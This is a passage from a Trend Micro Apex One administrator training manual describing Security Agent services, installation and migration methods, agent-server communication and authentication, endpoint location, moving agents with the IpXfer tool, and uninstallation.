than its parent domain. For example, if the System Administrator has permission to view and
configure all Agents that Apex One manages (the Apex One Server domain), the permissions for the
subdomains must allow the System Administrator access to these configuration features. Removing
a permission on a subdomain would mean that the System Administrator does not have full
configuration permissions for all Agents.

70 © 2019 Trend Micro Inc. Education


Lesson 3: Trend Micro Apex One Web Management Console

Recovering From Forgotten Passwords


The Password Reset Tool (OSCEResetPW.exe) can recover the password of the root administrator. An
administrative user must authenticate to the tool using their Windows Administrator password. Locate
the tool at the following location:
...\PCCSRV\Admin\Utility\OSCEResetPW

Run OSCEResetPW.exe and login with your Windows Domain Admin credentials to assign a new
password to the root administrator account.

© 2019 Trend Micro Inc. Education 71


Lesson 3: Trend Micro Apex One Web Management Console

72 © 2019 Trend Micro Inc. Education


Lesson 4: Security Agents

Lesson 4: Security Agents

Lesson Objectives:

After completing this lesson, participants will be able to:


• Describe the responsibilities of the Security Agent
• Describe the Security Agent services and components
• Install and uninstall Security Agents on endpoint computers
• Migrate from other security products
• Define Reference Servers
• Configure Security Agent settings
• View the status of Security Agents
• Configure Security Agent self-protection
• Grant user privileges to modify Security Agent settings

Security Agent Tasks


Security Agents are the protection-tier component of an Apex One environment. The Agent is
responsible for protecting hosts from malware, network threats, and Web threats. The Agent sends
events (such as virus/malware detection) and status information (for example, completion of an update,
Agent shutdown etc.) to the Apex One Server in real time.

Security Agents provide the following protection on endpoint computers:


• Conventional and SmartScan virus protection
• Grayware/Spyware protection
• Device control
• Firewall
• Outbreak prevention
• Smart Protection
• Behavior monitoring
• Data loss prevention
• Suspicious connection service
• Web threat protection
• Predictive Machine Learning protection
• Sample submission
• Memory scanning
• Browser Exploit protection
• Vulnerability protection
• Application Control protection

© 2019 Trend Micro Inc. Education 73


Lesson 4: Security Agents

Security Agent Services and Components


The following services and components are installed as part of the Security Agent.

Component Description
Apex One NT Listener Receives commands and notifications from the Apex One Server and is
Service (TmListen.exe) responsible for the following functionality:
• Server-Agent communication
• Updates
• Component startup
• Log delivery
Apex One NT Real-time Performs manual, on-demand and real-time scanning functionality and is
Scan Service responsible for using the following scan engines:
(Ntrtscan.exe) • Virus Scanning API (VSAPI)
• Spyware Scanning API (SSAPI)
• Damage Cleanup Engine (DCE)
• Advanced Threat Scanning Engine (ATSE)
• iCRC modules
This service also assumes responsibility for starting the Unauthorized
Change Prevention Service (TMBMSRV.exe).
Apex One NT Firewall Provides packet level firewall, network virus scanning, and
Service (TmPfw.exe) intrusion detection capabilities. Through the Web Management console,
administrators can create rules and apply them to filter connections (for
example, by application, IP address, port number, or protocol).
Trend Micro Unauthorized This service is responsible for protecting the Apex One registry settings
Change Prevention from unauthorized changes and preventing processes and services from
Service (TMBMSRV.exe) being stopped. This service is responsible for the following:
• Behavior Monitoring
• Device Control
• Certified Safe Software Service
Apex One Common Client This service provides a pluggable platform for new Trend Micro Core
Solution Framework Technologies. These technologies include:
(TmCCSF.exe) • Browser Exploit Prevention, which checks the behavior of web
pages in real time to detect malicious scripts and/or programs
• Behavior-based, enhanced memory scanning
• Advanced Threat Scan Engine DLL and Predictive Machine
Learning
Trend Micro Endpoint
Sensor Service This service provides integrated endpoint sensor capabilities.
(TMESC.exe)
Trend Micro Application
Control Agent Service This service provides application and device control capabilities.
(TMiACAgentSvc.exe)

74 © 2019 Trend Micro Inc. Education


Lesson 4: Security Agents

Component Description
Trend Micro Vulnerability This service provides integrated vulnerability protection capabilities. This
Protection Service service detects Intrusion Prevention rule violations and automates the
(iVPAgent.exe) application of virtual patches.
Trend Micro Advanced Identifies potentially compromised endpoints through on-demand
Threat Assessment assessment and monitoring. By integration with Trend Micro Threat
Service Investigation Center, Advanced Threat Assessment Service allows
(AtasAgent.exe) administrators and information security experts to perform forensic
tasks on endpoints for remote incident response.

Apex One Security Agents use the following non-service applications to provide additional functionality.

Apex One NT Monitor This process provides the user-interactive components of the Apex One
(PccNTMon.exe) Security Agent. It is responsible for the following functionalities:
• Starting the security agent console (PccNt.exe)
• Displaying the security agent icon in the system tray
• Sending quarantined files to the Apex One Server
• Detecting Internet Explorer proxy settings

Configuration Repositories
Security Agent configuration settings are stored in the following locations:
• Windows Registry: The Registry serves as the main repository for Security Agent settings on
Windows, including:
- Scan settings
- Agent-Server communication settings
- Web threat functionality settings
- Firewall settings
- Location awareness settings
• plist (Mac Agents): Mac Security Agent settings are stored in the macOS plist file.
• ous.ini: Contains information about alternative update sources that an Security Agent can use
• ofcscan.ini: Contains global Agent settings. Security Agents download this file from the
Server to obtain initial configuration settings
• GetServer.ini: Contains information regarding the Apex One Server when the Agent is
roaming.
• ssnotify.ini: Contains information related to existing Smart Protection Servers. Every time a
new Smart Protection Server becomes available for the Agent to choose from, it will be added to
this file.

© 2019 Trend Micro Inc. Education 75


Lesson 4: Security Agents

Security Agent Tree


The Security Agent tree displays all the Agents grouped into domains that the Server currently manages
and allows you to simultaneously configure, manage, and apply the same configuration to all domain
members.

The Security Agent tree icons display the type of endpoint and the status of Security Agents that Apex
One manages.

Above the Agent tree are menu items that allow administrators to perform specific tasks, such as
configuring Agent settings or initiating Agent tasks. To perform any of the tasks, select the task target
and then select a menu item. Alternately, menu items can be accessed by right-mouse clicking items in
the tree, such as the tree root, domains, groups or individual computers.

Deleting the Agent from the Agent tree does not remove the Security Agent from the Agent endpoint.
The Security Agent can still perform Server-independent tasks, such as updating components. However,
the Server is unaware of the existence of the Agent and will therefore not deploy configurations or send
notifications to the Agent.

76 © 2019 Trend Micro Inc. Education


Lesson 4: Security Agents

Security Agent System Requirements


The Security Agent can be installed on computers running Microsoft Windows or Mac platforms.

OfficeScan OfficeScan
Platform XG XG SP1 Apex One

Windows XP √ √ x
Windows 7 (SP1 required for Apex One) √ √ √
Windows 8 √ √ x
Windows 8.1 √ √ √
Windows 10 √ √ √
Windows Server 2003 √ √ x
Windows Server 2008 √ √ x
Windows Server 2008 R2 √ √ √
Windows Server 2012 √ √ √
Windows Server 2012 R2 √ √ √
Windows Server 2016 R2 √ √ √
Windows Server 2019 x x √
OS X Mavericks 10.9 or later √ √ √
OS X Yosemite 10.10 or later √ √ √
OS X El Capitan 10.11 √ √ √
macOS Sierra 10.12 √ √ √
macOS High Sierra 10.13 √ √ √
macOS Mojave 10.14 x x √

Hardware Requirements
• Processor: 300 MHz Intel Pentium or equivalent (Windows 7, 8.1, 10 family) and Intel Core
processor for Mac
1.0 GHz minimum (2.0 GHz recommended) Intel Pentium or equivalent (Windows Embedded
POSReady7)
1.4 GHz minimum (2.0 GHz recommended) Intel Pentium or equivalent (Windows 2008 R2,
Windows 2016 family, Windows 2019 family)
• Memory: 512 MB minimum (2.0 GB recommended) with at least 100 MB exclusively for Apex
One (Windows 2008 R2, 2012 family)
1.0 GB minimum (2.0 GB recommended) with at least 100 MB exclusively for Apex One
(Windows 7 (x86), 8.1 (x86), Windows Embedded POSReady 7, 10 (x64) family)
2.0 GB minimum (4.0 GB recommended) with at least 100 MB exclusively for Apex One
(Windows 7 (x64), 8.1 (x64), 10 (x64) family)
512 MB minimum for Apex One on Mac
• Disk Space: 1.5GB minimum (3GB recommended for all products) for Windows, 300 MB
minimum for Mac

© 2019 Trend Micro Inc. Education 77


Lesson 4: Security Agents

Installing Security Agents


There are several installation methods available for Security Agent deployment. Factors which can
affect the selection of the installation method used by your organization can include:
• The method used in the organization to deploy new endpoint computers (for example, are
endpoint computers based on a golden image, or a scripted mechanism)
• The method used to distribute new software (for example, are new applications deployed
automatically using SCCM, Active Directory policies, or installed by the end user)
• The network bandwidth available during the deployment
• Administrator preference
• The operating system used on the endpoint computer

Security Agent Deployment Prerequisites


Insure that the following prerequisites are met before attempting to install an Security Agent using
one of the above methods:
• Communication with Apex One Server is available
• Administrative level privileges are required to install software
• No registry keys already on client from previous installation
• Client can access UNC path of Apex One installation folder (for Remote, Web, or AutoPCC
installs)
• If an existing antivirus application is present, it must be removable by Apex One
• File and Print Sharing must be excluded from the Windows Firewall for some methods
• Remote Registry Service enabled for some methods

Remote Installation
This method installs a Security Agent remotely from the Apex One Server Web Management console
page. This method can be used if the Apex One Server has been installed on one of the following
platforms:
• Windows Server 2012 with IIS 8.0
• Windows Server 2012 R2 with IIS 8.5
• Windows Server 2016 with IIS 10
• Windows Server 2019 with IIS 10

78 © 2019 Trend Micro Inc. Education


Lesson 4: Security Agents

The Agent can be installed from Agents > Remote Installation in the Apex One Web Management
console.

Remote installation requires that File and Printer Sharing be excluded from the Windows Firewall
and that the Windows Remote Registry service be running.

Note: Remote installation does not install the Security Agent on endpoints running an Apex One
Server.

© 2019 Trend Micro Inc. Education 79


Lesson 4: Security Agents

Unmanaged Endpoints
In an on-premise installation, Agent can be installed from Assessment > Unmanaged Endpoints. In
this example, unmanaged endpoints in Active Directory will be displayed after using Define Scope
and selecting a branch in the Directory tree.

To use Unmanaged Endpoints, ensure that the Apex One Server computer is part of the network and
can query Active Directory domains or IP addresses. With this feature, administrators can check for
computers with the following status:
• Security Agents within the network domains but managed by another Apex One Server
• Computers without Security Agents installed
• Unreachable computers that cannot connect to a specific checking port (the default port
value is 135)
• Computers within the Active Directory domain but Apex One Server is unable to determine
their security status

For the first two points listed above, Apex One Server attempts to connect to target Agents through
port 135. It sends a request to the target machine, and the latter replies with a valid response.

80 © 2019 Trend Micro Inc. Education


Lesson 4: Security Agents

Installer Link
This method creates an email message that instructs users on the network to install the Security
Agent by clicking the installer link provided in the email.

AutoPcc
This method uses a script to automate the installation of the Security Agent on unprotected
computers. Endpoints must be part of the domain to be able to use AutoPcc using a Uniform Naming
Convention (UNC) path.

© 2019 Trend Micro Inc. Education 81


Lesson 4: Security Agents

Agent Packager
The Agent Packager utility (clnpack.exe) creates an installation package that you can send to
users using conventional media such as CD-ROM or deployed using Microsoft SMS or Active
Directory. Users run the packaged application on the Agent endpoint to install or upgrade the
Security Agent and update components. Agent Packager is especially useful when deploying the
Security Agent or components to Agents in low-bandwidth remote offices. Security Agents installed
using Agent Packager report to the Server where the package was created.

An Agent package can also be downloaded from the Apex One Server login page, but the
configuration options available are limited.

82 © 2019 Trend Micro Inc. Education


Lesson 4: Security Agents

Microsoft System Center Configuration Manager or Active


Directory Installation
An Security Agent MSI package created using the Agent Packager can be deployed using a Microsoft
System Center Configuration Manager (SCCM) if you have Microsoft BackOffice installed on the
Server. The SCCM Server needs to obtain the MSI file from the Apex One Server before it can deploy
the package to target endpoints.

When Microsoft SCCM distributes the advertised program (that is, the Security Agent program) to
target endpoints, a screen displays on each target endpoint. Instruct users to click Yes and follow
the instructions provided by the wizard to install the Security Agent to their endpoints.

In addition, administrators can take advantage of Active Directory Group Policy features to deploy
the MSI package simultaneously to multiple Agent endpoints.

Agent Disk Images


Disk imaging technology allows you to create an image of the Security Agent using disk imaging
software and make clones of it on other computers on the network. Each Security Agent installation
needs a Globally Unique Identifier (GUID) so that the Server can identify Agents individually. Use the
Apex One program called ImgSetup.exe to create a different GUID for each of the clones.

Apex Central
The Security Agent Download page in the Apex Central Web Management console creates a Security
Agent installation packages for Apex One or Apex One (Mac). You can use this page to download and
install the Security Agent packages locally or to display a URL that you can send to users to install
the Security Agent directly on a target endpoint.

Note: Apex One must be available as a Manager Server in Apex Central for the Security Agent
Download page to include the appropriate items.

© 2019 Trend Micro Inc. Education 83


Lesson 4: Security Agents

Migrating From Other Endpoint Security Software


When you install the Security Agent on Windows, the installation program checks for any Trend Micro or
third-party endpoint security software installed on the target endpoint. The installation program can
automatically uninstall the software and replace it with the Security Agent.

For a list of endpoint security software that Apex One automatically uninstalls, open the tmuninst.ptn
and tmuninst_as.ptn files in the ...\PCCSRV\Admin folder using a text editor such as Notepad.

If the software on the target endpoint is not included in the list, manually uninstall it first. Depending on
the uninstallation process of the software, the endpoint may or may not need to restart after
uninstallation.

tmuninst_as.ptn
The tmuninst_as.ptn file contains uninstallation commands for Trend Micro security software
that must be removed from the endpoint before installing the Security Agent. If an entry in the file
exists for an application, the setup routine will be able to uninstall the application automatically.

84 © 2019 Trend Micro Inc. Education


Lesson 4: Security Agents

tmuninst.ptn
The tmuninst.ptn file contains uninstallation commands for third-party security software that
must be removed from the endpoint before installing the Security Agent. If an entry in the file exists
for an application, the setup routine will be able to uninstall the application automatically. If the
application currently installed on the endpoint does not contain an entry in this file, the application
must be manually removed through Control Panel before proceeding with the Agent setup.

Coexist Mode
Though it is not a recommended implementation, the Apex One Security Agent can be installed on
endpoints in Coexist Mode. This mode allows third-party anti-malware products to be used on the
same endpoint as the Apex One Security Agent. In this implementation, Apex One provides some
security features, like Application Control and Vulnerability Protection, while making use of the
malware scanning capabilities of the other application.

Anti-malware applications tested in co-exist mode include the following:


• Symantec Endpoint Protection 14
• Sophos Endpoint Security 10.6
• Kaspersky Security Center 10
• McAfee Endpoint Security 10.5
• Microsoft Defender / Microsoft Security Essentials

In coexist mode, Security Agents will not report their status to Windows Security Center. This is to
keep other competitor applications running.

It is possible to upgrade Agents installed in Coexist Mode to full functionality through Apex Central.
This process will also uninstall any non-Microsoft third-party security applications.

© 2019 Trend Micro Inc. Education 85


Lesson 4: Security Agents

In Apex Central, create and deploy a policy to the Security Agent including the Privileges and Other
Settings value of Permanently Convert Security Agents using coexist mode into fully-functional
Security Agents.

Post Installation Tasks


Once the Security Agent is installed on the endpoint, the following tasks can be attempted to confirm its
operation and update it to use the current malware patterns.

Component Updates
Update the Security Agent components to ensure that Agents have the most up-to-date protection
against security risks. You can run manual Agent updates from the Web Management console or
instruct users to run Update Now from their computers.

Test Scan using EICAR Test Script


The European Institute for Computer Antivirus Research (EICAR) developed the EICAR test script as
a safe way to confirm proper installation and configuration of antivirus software. The EICAR web site
is available at:
http://www.eicar.org

Installation Logs
The Security Agent installation log (ofcnt.log) exists in %windir% for all installation methods
except MSI package installation and %temp% for the MSI package installation method.

86 © 2019 Trend Micro Inc. Education


Lesson 4: Security Agents

Agent-To-Server Communication
Agents communicate with their Server by sending HTTPS messages to the Web Server on the Apex One
Server and calling ISAPI/CGI commands. These commands invoke certain actions on the Server and the
Server sends a corresponding answer to the Agent's request. These messages can be sent to the Server
as a response to a Server notification. While doing this, they also pass information about the Agent, for
example UID, computer name, program version, etc. These calls are processed by the Agent command
handler, which checks if the Agent information is correct, complete and valid. If it is, the Server points
the Agents to the location to download relevant files. Otherwise, the Server sends an error code to the
Agents. You can configure Apex One to ensure that all communication between the Server and Agents
are valid. Apex One provides public-key cryptography and enhanced encryption features to protect all
communication between the Server and Agents.

Security Agent Apex One Server

https

IUSR_{servername} IIS
Internet Guest account

Apex One
ISAPI/
Master
CGI
Service

Agent-to-Server (IIS) communication is performed using the IUSR {servername} account (Internet
Guest). This user account is essential for Apex One to function properly, so it must exist on the Server
and have proper privileges (for example, privilege to run ISAPIs).

Web Server logs can be a useful source of troubleshooting information. In addition, to verify the Agent to
Server communications, enter the following URL in Internet Explorer:
https://<apexone_server>:port/officescan/cgi/cgionstart.exe

If the number -2 appears on the browser, then the Agent is able to communicate with the Server.

Note: Apex One moves the communication between Agents and the Server to HTTPS. By moving to
HTTPS, the communication port on the Server will also change from the HTTP port (default of
8080) to the HTTPS port ( same as the Web Management console, default of 4343).

Some environments may encounter HTTPS communication issues due to various factors (for
example, inconsistent SSL/TLS environments, firewalls blocking the HTTPS port, etc.). This can
result in agents showing offline, failing to upgrade, and not uploading logs or quarantined files.

Using HTTPS also creates the need for certificates and certificate validation. All Apex One Security
Agents have their own self-signed certificate they use for communication and verification with the Apex
One Server. This can be a problem in environments that deploy HTTPS Inspection gateways. With HTTPS
Inspection, the Security Gateway can inspect the traffic that is encrypted by HTTPS.

© 2019 Trend Micro Inc. Education 87


Lesson 4: Security Agents

The Security Gateway uses certificates and becomes an intermediary between the client computer and
the secure website. This causes a problem as Apex One will not trust the Security Gateway’s certificate.
Thus, Apex One traffic must be excluded from HTTPS Inspection on Security Gateway products.

In some instances for compatibility or network inspection purposes, traffic can be reverted to HTTP.

Server-to-Agent Communication
When the Server initiates the action, it sends a TCP message to the Agent at the Agent port stored in the
database. Note that Agent communication ports are randomly generated during setup. The
administrator can still modify this randomly generated port if necessary during setup. The
communication from Apex One Server to Agent (and vice-versa) is event driven. When specific events
occur on the Agent or on the Server, an action may be triggered.

Server-to-Agent communication is a four-step process. A simplified representation of how Apex One


Servers and Agents communicate is illustrated here:
1 Notification: In this phase, the Apex One Server notifies the Security Agent to retrieve
instructions from the Apex One Server.

Apex One Agent Apex One Server

IUSR_{servername}
Internet Guest account

Apex One
ISAPI/
Master
CGI
Service

TCP

2 Call ISAPI/CGI: The Security Agent, specifically its TMListener component, responds to the
notification in the previous phase by calling ISAPI/CGI applications on the Server. This phase
actually involves calls to multiple ISAPI/CGI applications. The applications called depend on the
type of command.

OfficeScan Agent OfficeScan XG Server

https

IUSR_{servername}
Internet Guest account

OfficeScan
ISAPI/
Master
CGI
Service

88 © 2019 Trend Micro Inc. Education


Lesson 4: Security Agents

3 Server-side processing: The ISAPI/CGI applications on the Server retrieve settings from the
relevant Apex One information storage areas (for example, ofcscan.ini, Apex One database).

Apex One Agent Apex One Server

https

IUSR_{servername}
Internet Guest account

Apex One
ISAPI/
Master
CGI
Service

4 Response: The Agent receives the required response from the ISAPI/CGI.

Apex One Agent Apex One Server

http

IUSR_{servername}
Internet Guest account

Apex One
ISAPI/
Master
CGI
Service

https

To optimize communication performance, the administrator can modify ofcscan.ini. The parameters
related to Server performance are in the [INI_SERVER_SECTION]. Some of these parameters can also
be easily reconfigured using the Server Tuner (SvrTune.exe) located following folder on the Server:
…\PCCSRV\Admin\Utility

© 2019 Trend Micro Inc. Education 89


Lesson 4: Security Agents

Authenticating Server-Initiated Communications


Apex One uses two methods for authenticating Server-initiated communications:
• Notification Authentication: The Apex One Server signs the notification message before
sending it out to the Agents. The Agent will accept or reject the notification depending on
the results of the signature verification.
• Data Authentication: Data from the Apex One Server is authenticated and filtered by the
Security Agent using a hash checking mechanism.

Notification Authentication

Apex One uses public-key cryptography to authenticate notifications from the Apex One Server
to Security Agents. With public-key cryptography, the Server keeps a private key and deploys a
public key certificate to all Agents. The Agents use the public key in the certificate to verify that
incoming notifications are from the Apex One Server and they are valid. The Agents respond or
carry out the instructions if the verification is successful.

Note: The Apex One Server does not authenticate communications from Security Agents.

During installation of the Apex One Server, the setup stores the public key certificate in the host
computer's certificate store. Use the Authentication Certificate Manager tool to manage Trend
Micro certificates and keys.

Before reinstalling the Apex One Server, ensure that you back up the existing certificate. After
the new installation completes, import the backed up certificate to allow communication
authentication between the Apex One Server and Security Agents to continue uninterrupted. If
you create a new certificate during Server installation, Security Agents cannot authenticate
Server communication because they are still using the old certificate (which no longer exists).

Data Authentication

Apex One uses the same keys and certificates for Data Authentication as it does for Notification
Authentication. There are three types of data that the Agents may receive:
• CGI/ISAPI: When invoking a CGI or ISAPI, the Agent sends the serial number and issuer of the
Certificate it has, plus a random salt value. The Server then appends the salt value to the
result of the CGI/ISAPI and uses the private key associated with the Certificate to sign it. The
Agent will then verify the signature with the Certificate and check the salt value before
accepting the result.
If there is no issuer or serial number, the Server simply returns the content without
providing any signature. If there is an issuer and a serial number but the Server does not
have that Certificate, an HTTP 404 error is returned.
• Program files: When downloading a program file, the Agent creates an MD5 hash of the file
and compares it to a hotfix table which has been downloaded at an earlier time and validated
using the Static files authentication process.
• Static files: When downloading a static file, the Agent also downloads a signature file. The
signature file has been created by the Apex One Server by taking a SHA-1 hash of the file,
then signing this with each of the Server's private keys. Also included in the file is the

90 © 2019 Trend Micro Inc. Education


Lesson 4: Security Agents

Certificate serial number and issuer for the Certificates associated with each of those
private keys. The Agent then verifies the appropriate signature with the Certificate it holds.

Support for third-party certificates


Apex One supports third-party signed authentication certificates given the following requirements:
• The import file must be in PFX format, which contains only one certificate
• The certificate must contain a signed key
• It must use either of the following algorithms:
- Microsoft Enhanced Cryptographic Provider v1.0
- Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider
• The minimum key length of the certificate must be 1024 bits

Using a Single Key With Multiple Apex One Servers


When deciding on whether to use a single authentication key across all Apex One Servers, take note
of the following:
• Implementing a single authentication key is a common practice for standard levels of
security. This approach balances the security level of your organization with the overhead
associated with maintaining multiple keys.
• Implementing multiple authentication keys across Apex One Servers provides a maximum
level of security. This approach increases the maintenance required when certificates expire
and need to be redistributed across the Servers and Agents.
Before reinstalling the Apex One Server, ensure that you back up the existing key and
certificate. After the new installation completes, import the backed-up key and certificate to
allow communication authentication between the Apex One Server and Security Agents to
continue uninterrupted. If you create a new certificate during Server installation, Security
Agents cannot authenticate Server communication because they would still be using the old
certificate.

Heartbeat
Heartbeats are real-time messages that Agents send to the Server over HTTP/TCP that indicates the
connection from the Agent remains functional. It addresses the issue of Agents in unreachable networks
always appearing as offline even when they can connect to the Server, for example, when behind a NAT
firewall.

If the Server does not receive a heartbeat, it does not immediately treat the Agent as offline. These
settings control the waiting time of the Server before changing an Agent's status to offline or
unreachable/offline.

The Agent heartbeat status contains the last heartbeat sending status and new heartbeat sending
status. By using these two values, the status handler can know if the Agent status is changed and only
update the Agent status which has changed, instead of all unreachable Agents.

© 2019 Trend Micro Inc. Education 91


Lesson 4: Security Agents

To configure the heartbeat period, click Agents > Global Agent Settings. In the Unreachable Networks
section, click to allow Agent to send heartbeats and set the time period.

Server Polling
This feature is independent of the heartbeat feature and is related to updates polling regarding
settings and components. The polling command from Agent to Server is another case of heartbeat
sending.

Agent Connection Status


The Security Agent connection status depends on the way in which the Apex One Server communicates
with the Security Agent. The different connection statuses available for the Security Agent include:

Online
The Security Agent can connect to the Apex One Server for bi-directional communication of the
following:
• Policy settings
• Updates
• Scan commands
• Suspicious Object list synchronization
• Sample submission
• Log submission

Offline
The Security Agent has no functional connection with the Apex One Server or an Edge Relay Server.

92 © 2019 Trend Micro Inc. Education


Lesson 4: Security Agents

Independent
The Security Agent can connect to the on-premise Apex One Server but communication is limited.
While in Independent mode:
• The Security Agent does not accept policy settings from the Server
• The Security Agent does not initiate scan commands from the Server
• The Security Agent does not send logs to the Server

You can configure Independent Agents with privileges to allow or block component updates if a
functional connection to the Apex One Server is available.

End users can manually initiate scans and updates on Agents in Independent mode.

Off-premises
The Security Agent is outside of the corporate network and cannot connect to the on-premise Apex
One Server directly. The Security Agent can, however, connect to an Edge Relay Server for the
following:
• Suspicious Object list synchronization
• Sample submission
• Log submission

The Connection Status for an off-premises Agent displays as Offline in the Agent tree because the
Apex One Server has no direct connection with the Security Agent.

Endpoint Location
One of the ways the Security Agent determines which policy or profile to use is by checking its
connection status with the Apex One Server. If an internal Security Agent (or any Agent within the
corporate network) cannot connect to the Server, the Agent status becomes offline. The Agent then
applies a policy or profile intended for external Agents. Endpoint location helps address this issue.

© 2019 Trend Micro Inc. Education 93


Lesson 4: Security Agents

Policies and profiles managed by Reference Servers include:


• Firewall profiles
• Web reputation policies
• Data Protection policies
• Device Control policies
• Smart Scan

Reference Server List


Any Security Agent that loses connection with the Apex One Server will try connecting to Reference
Servers using Telnet on a specified port. If the Agent successfully establishes connection with the
Reference Server, it applies the policy or profile for internal Agents.

Security Agents connect to the first Reference Server on the list. If connection cannot be
established, the Agent tries connecting to the next Server on the list.

Assign computers with Server capabilities, such as a Web Server, SQL Server, or FTP Server as
Reference Servers. You can specify a maximum of 320 Reference Servers. Security Agents use
Reference Servers when determining the antivirus, behavior monitoring, device control, firewall
profiles, web reputation policy or data protection settings to use.

Note: Reference Servers do not manage Agents or deploy updates and Agent settings. The Apex One
Server performs these tasks.

In the Apex One Web Management console, click Agents > Endpoint Location and click Edit the
Reference Servers list. Click Enable the reference server list and click Add to add any Reference
Servers by identifying the IP address, endpoint name or FQDN along with the port number.

94 © 2019 Trend Micro Inc. Education


Lesson 4: Security Agents

Gateways
Alternately, Gateway IP addresses or MAC addresses can be used for endpoint location. Type the IP
address of the Gateway and optionally, the MAC address and click Add. Multiple Gateway addresses
can be added. The Gateway Setting Importer (GSImporter.exe) tool can be used to import a list of
gateway IP addresses from a text file.

Excluding VPN Connections


NEW

An enhancement for location awareness in Apex One will check the network adapter used to
connect to the reference host and identify if the endpoint is internal or external.

Previously, when an external Security Agent connects to the Apex One Server using VPN
connection, it was referred as an internal agent and the related internal policy settings were
applied. VPN clients (Cisco, F5, Fortigate…) create a virtual network adapter as a network device
to communicate with target network.

In Apex One, a new setting called Exclude agents using VPN or PPP dial-up connections is
available. When enabled, Security Agents connected to the server using a VPN connection, they
will be identified as an external Agent and apply corresponding configurations.

© 2019 Trend Micro Inc. Education 95


Lesson 4: Security Agents

Moving Agents Between Apex One Servers


If you have more than one Apex One Server on the network, you can transfer existing Security Agents
from one Apex One Server to another.

In the Apex One Web Management console, click Agents > Agent Management. Select the Security Agent
to move and click Manage Agent Tree > Move Agent. Identify the details of the Apex One Server to move
the Agent to.

Agent Mover Tool


The Agent Mover tool (IpXfer.exe) can also be used to transfer Security Agents from one Apex
One Server to another. The commands available with this tool can be used within scripts to move
Agents, or if Agents don’t move properly through the Web Management console. This tool is for
moving Agent only and is not used for uninstalling or removing Agents from Apex One.

Note: Both Apex One Servers must be using the same language version. Also, if you are using Agent
Mover to move an Security Agent running an earlier version of Apex One to a Server that is
running the current version, the Security Agent will be upgraded automatically.

1 On the source Apex One Server, locate the following folder and copy the file IpXfer.exe to the
Security Agent endpoint:
...\PCCSRV\Admin\Utility\IpXfer
If the Security Agent endpoint runs on 64-bit platform, copy IpXfer_x64.exe instead.
2. On the Security Agent endpoint, open a command prompt window and run IpXfer.exe with the
following syntax:
IpXfer -s <server_name> -p <server_HTTP_listening_port>|-sp <server_
HTTPS_listening_port> -c <agent_listening_port> -d <domain_or_domain
hierarchy> -e <Certificate_location_and_file_name> - pwd <agent_un-
load_and_unlock_privilege_password>

Examples:
ipXfer_64.exe -s Server01 -p 8080 -sp 4343 -c 21112 -d Workgroup -pwd unlock

96 © 2019 Trend Micro Inc. Education


Lesson 4: Security Agents

Parameter Description
<executable file name> IpXfer.exe or IpXfer_x64.exe
-s <server name> The name of the destination Apex One Server.
The HTTP listening port (or trusted port) of the destination
-p <HTTP_server_listening_ Apex One Server.
port> To view the listening port on the Apex One Web Management
console, click Administration > Settings > Agent Connection.
-sp <HTTPS_server_listening_ The HTTPS listening port (or trusted port) of the destination
port> Apex One Server.

-c <Agent_listening_port> The port number used by the Security Agent endpoint to


communicate with the Server.
-d <domain_or_domain The Agent tree domain or group to which the Agent will be
hierarchy> grouped.
Imports a new authentication certificate for the Security
Agent during the move process.
If this parameter is not used, the Security Agent automatically
retrieves the current authentication certificate from its new
managing Server.
-e
<Certificate_location_and_ NOTE: The default certificate location on the Apex One Server
file_name> is:
...\PCCSRV\Pccnt\Common\OfcNTCer.dat.
When using a certificate from a source other than Apex One,
ensure that the certificate is in Distinguished Encoding Rules
(DER) format.
The unload and unlock privilege password configured in
-pwd Privileges and Other Settings. If the unload and unlock
<Agent_unload_and_unlock password is required and you do not provide the password,
privilege_password> Agent Mover
prompts you before attempting to move Agents.
3 To confirm whether the Security Agent is now reporting to the new Server:
• Go to the Security Agent endpoint.
• Right-click the Security Agent program icon in the system tray.
• Click Component Versions.
• Verify the Apex One Server that the Security Agent reports to by examining the Server
name/port field.

Note: If the Security Agent does not appear in the Agent tree of the new Apex One Server managing it,
try restarting the Master Service (ofservice.exe) on the destination Apex One Server.

© 2019 Trend Micro Inc. Education 97


Lesson 4: Security Agents

Uninstalling Security Agents


Security Agents can be uninstalled from an endpoint computer using one of the following methods.

Uninstalling From the Web Management Console


On the Agent Management menu, located the endpoints for which the Agent will be uninstalled and
click Tasks > Agent Uninstallation.

Uninstalling from Windows Control Panel


Users must be granted the privilege to uninstall the Security Agent program. Depending on your
installation, users may be required to enter a password to perform the uninstall. If a password is
required, ensure that you share the password only to users that will run the uninstallation program.
Change the password immediately if it has been compromised.

In Windows Control Panel, select Add or Remove Programs. Locate Trend Micro Security Agent and
click Change. Follow the prompts to uninstall the Agent. If required, authorization must be provided
to complete the removal. The password for uninstalling the Agent was provided as part of the Apex
One Server setup process.

98 © 2019 Trend Micro Inc. Education


Lesson 4: Security Agents

Uninstalling Manually
If any problems are encountered using the above methods to uninstall the Security Agent, you can
manually uninstall the Security Agent from a computer using the process described in the following
article:
https://success.trendmicro.com/solution/1039283-uninstalling-clients-or-
Agents-in-officescan-osce

Custom Uninstall Tool


If it is not possible to reinstall an Agent because there are still program entries in the Registry, Trend
Micro Support can provide you with the Custom Uninstall Tool (CUT Tool). This time-limited tool
removes all trace of Apex One Security Agents from an endpoint.

Removing Inactive Agents


When you use the Security Agent uninstallation program to remove the Security Agent program from
endpoints, the program automatically notifies the Server. When the Server receives this notification, it
removes the Security Agent icon in the Agent tree to show that the Agent does not exist anymore.

However, if you use other methods to remove the Security Agent, such as reformatting the endpoint
hard drive or deleting the Security Agent files manually, Apex One will not be aware of the removal and it
will display the Security Agent as offline. If a user unloads or disables the Security Agent for an extended
period of time, the Server also displays the Security Agent as offline.

To have the Agent tree display active Agents only, configure Apex One to automatically remove inactive
Agents from the Agent tree.

In the Apex One Web Management console, click Administration > Settings > Inactive Agents. Click Enable
automatic removal of inactive Agents and select how many days should pass before Apex One considers
the Security Agent inactive.

© 2019 Trend Micro Inc. Education 99


Lesson 4: Security Agents

Security Agent Settings


Apex One administrators have the flexibility to apply security settings either to individual Agents or
groups of Agents.

Root Settings
Settings at this control point define the global default. This is the only control point with the option
to either overwrite all existing settings or define the settings for all future domains. Settings at this
level are stored in the ofcscan.ini.

100 © 2019 Trend Micro Inc. Education


Lesson 4: Security Agents

Domain Settings
These settings apply to all Agents in a particular domain. Agents automatically adopt domain
settings when they join a domain. Settings at this level are stored in the Apex One Database.

Agent Settings
Changes made at this control point apply to individual Agents. This allows administrators to
customize settings for specific desktops. Settings at this level are stored in the Apex One Database.

